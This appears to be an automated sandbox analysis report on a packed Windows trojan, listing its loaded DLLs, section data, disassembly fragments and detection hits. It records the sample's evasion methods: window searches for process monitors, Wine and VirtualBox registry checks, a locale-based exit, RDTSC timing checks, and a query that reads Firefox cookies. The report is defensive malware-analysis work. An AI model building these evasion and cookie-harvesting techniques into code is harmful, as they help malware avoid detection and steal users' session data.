              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C25991_2_006C2599
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F66611_2_007F6661
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0075EE381_2_0075EE38
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0080563B1_2_0080563B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008406741_2_00840674
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00801F8E1_2_00801F8E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0080A7971_2_0080A797
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007CA78C1_2_007CA78C
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00434A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: dfcaugdi ZLIB complexity 0.9950350087347606
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00453A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00453A50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_0044CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FICSO1SK.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
              Source: file.exeVirustotal: Detection: 51%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1827840 > 1048576
              Source: file.exeStatic PE information: Raw size of dfcaugdi is bigger than: 0x100000 < 0x1a4600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dfcaugdi:EW;yusrdzyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dfcaugdi:EW;yusrdzyr:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00456390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00456390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c5494 should be: 0x1cd384
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: dfcaugdi
              Source: file.exeStatic PE information: section name: yusrdzyr
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E3888 push 4F275242h; mov dword ptr [esp], ecx1_2_008E38B4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E3888 push 13B1BDE8h; mov dword ptr [esp], ebx1_2_008E38E7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E3888 push ebx; mov dword ptr [esp], 5D6800C3h1_2_008E390A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E3888 push edx; mov dword ptr [esp], esi1_2_008E3968
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0089C0A1 push esi; mov dword ptr [esp], edx1_2_0089C384
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008DA0F9 push ebx; mov dword ptr [esp], 0EF52A74h1_2_008DA114
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E281B push 53BDEB2Eh; mov dword ptr [esp], edx1_2_008E2839
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0090880E push 37530FD9h; mov dword ptr [esp], edx1_2_00908845
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0089702E push edx; mov dword ptr [esp], ebx1_2_0089708C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007600DF push 15D77B00h; mov dword ptr [esp], ebx1_2_00760119
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007600DF push eax; mov dword ptr [esp], ecx1_2_00760128
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007600DF push 7DB8AC7Eh; mov dword ptr [esp], ebx1_2_00760193
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007600DF push 7B1064C1h; mov dword ptr [esp], edi1_2_00760237
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00457895 push ecx; ret 1_2_004578A8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0088A86C push 41399E9Ch; mov dword ptr [esp], ebp1_2_0088A890
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008B886E push edx; mov dword ptr [esp], eax1_2_008B888F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008AC078 push ebx; mov dword ptr [esp], 1C6B91E6h1_2_008AC0E1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008AC078 push ebx; mov dword ptr [esp], edx1_2_008AC108
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push ecx; mov dword ptr [esp], eax1_2_007F8179
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 5BD8E8BDh; mov dword ptr [esp], edx1_2_007F81B5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 54E8EEC5h; mov dword ptr [esp], ebp1_2_007F8206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push edi; mov dword ptr [esp], edx1_2_007F827E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push esi; mov dword ptr [esp], 03DBF978h1_2_007F82C5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 6C2C7A43h; mov dword ptr [esp], ecx1_2_007F82F1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push ecx; mov dword ptr [esp], edi1_2_007F8372
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push edi; mov dword ptr [esp], 10756933h1_2_007F841F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push edi; mov dword ptr [esp], eax1_2_007F8435
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 34860913h; mov dword ptr [esp], edx1_2_007F845A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 578A41E5h; mov dword ptr [esp], ecx1_2_007F8469
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push ecx; mov dword ptr [esp], 6021FA52h1_2_007F84C0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F8174 push 5626A3DBh; mov dword ptr [esp], edx1_2_007F85A1
              Source: file.exeStatic PE information: section name: dfcaugdi entropy: 7.955038828119067

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00456390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00456390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-25950
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108F5 second address: 81090D instructions: 0x00000000 rdtsc 0x00000002 js 00007FEF0C74E726h 0x00000008 ja 00007FEF0C74E726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FEF0C74E732h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81090D second address: 810913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810913 second address: 810933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007FEF0C74E737h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810933 second address: 81093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81093B second address: 810952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FEF0C74E732h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810952 second address: 810959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810ACD second address: 810AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E72Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141DE second address: 8141FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141FB second address: 814232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b add edx, 35175414h 0x00000011 push 00000000h 0x00000013 or dword ptr [ebp+122D2951h], edx 0x00000019 call 00007FEF0C74E729h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814232 second address: 814266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEF0C6C765Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FEF0C6C765Ch 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814266 second address: 81429D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d jmp 00007FEF0C74E732h 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FEF0C74E733h 0x0000001d jmp 00007FEF0C74E72Dh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81436F second address: 814374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814374 second address: 814397 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D3906h] 0x0000000f lea ebx, dword ptr [ebp+12468085h] 0x00000015 mov cx, 27C7h 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FEF0C74E726h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81457E second address: 8145A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEF0C6C7658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FEF0C6C765Fh 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8145A1 second address: 814615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FEF0C74E72Bh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007FEF0C74E734h 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FEF0C74E728h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 xor edx, 1F45B1FBh 0x00000037 push eax 0x00000038 cmc 0x00000039 pop ecx 0x0000003a lea ebx, dword ptr [ebp+1246808Eh] 0x00000040 mov dword ptr [ebp+122D22C0h], eax 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a jmp 00007FEF0C74E730h 0x0000004f pop esi 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814615 second address: 814628 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FEF0C6C7658h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81466F second address: 8146BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEF0C74E733h 0x00000008 jnp 00007FEF0C74E726h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D3539h], ebx 0x0000001a push 00000000h 0x0000001c xor dword ptr [ebp+122D2268h], ebx 0x00000022 push 4EB9AA3Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEF0C74E736h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8146BC second address: 814742 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEF0C6C7658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4EB9AABCh 0x00000013 mov dword ptr [ebp+122D1F47h], ecx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FEF0C6C7658h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push 00000003h 0x00000039 add dword ptr [ebp+122D2971h], eax 0x0000003f push 604B72A3h 0x00000044 push eax 0x00000045 jmp 00007FEF0C6C7668h 0x0000004a pop eax 0x0000004b add dword ptr [esp], 5FB48D5Dh 0x00000052 mov ecx, dword ptr [ebp+122D3872h] 0x00000058 lea ebx, dword ptr [ebp+12468099h] 0x0000005e sbb cx, 067Ah 0x00000063 movzx edi, ax 0x00000066 xchg eax, ebx 0x00000067 jp 00007FEF0C6C7664h 0x0000006d push eax 0x0000006e push edx 0x0000006f push esi 0x00000070 pop esi 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835BF5 second address: 835BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD21 second address: 80BD2D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEF0C6C7656h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD2D second address: 80BD53 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FEF0C74E72Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD53 second address: 80BD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FEF0C6C7656h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD63 second address: 80BD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD69 second address: 80BD6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A5D second address: 833A88 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jp 00007FEF0C74E726h 0x00000013 popad 0x00000014 push ebx 0x00000015 jmp 00007FEF0C74E734h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A88 second address: 833A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A92 second address: 833AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007FEF0C74E726h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833D6A second address: 833D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEF0C6C765Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833D7D second address: 833D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833EBA second address: 833ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FEF0C6C765Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833ECD second address: 833EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEF0C74E726h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FEF0C74E726h 0x00000012 jnl 00007FEF0C74E726h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push ecx 0x0000001e jmp 00007FEF0C74E731h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834211 second address: 834235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEF0C6C7656h 0x0000000a jmp 00007FEF0C6C7669h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8348F1 second address: 8348FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8348FA second address: 83491A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FEF0C6C7656h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83491A second address: 83491E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834A6F second address: 834A8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C6C7658h 0x00000008 js 00007FEF0C6C765Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834A8A second address: 834A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8283AC second address: 8283B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8283B0 second address: 8283BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E72Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80515E second address: 80517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEF0C6C7669h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80517D second address: 805181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805181 second address: 805185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835307 second address: 83530D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83530D second address: 835316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835316 second address: 83531A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83531A second address: 835332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7664h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835332 second address: 835338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835617 second address: 83562C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Bh 0x00000007 jo 00007FEF0C6C7672h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83562C second address: 835656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E736h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FEF0C74E738h 0x00000011 jg 00007FEF0C74E732h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835A8D second address: 835A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838E48 second address: 838E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841244 second address: 841265 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FEF0C6C7656h 0x00000011 jmp 00007FEF0C6C765Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
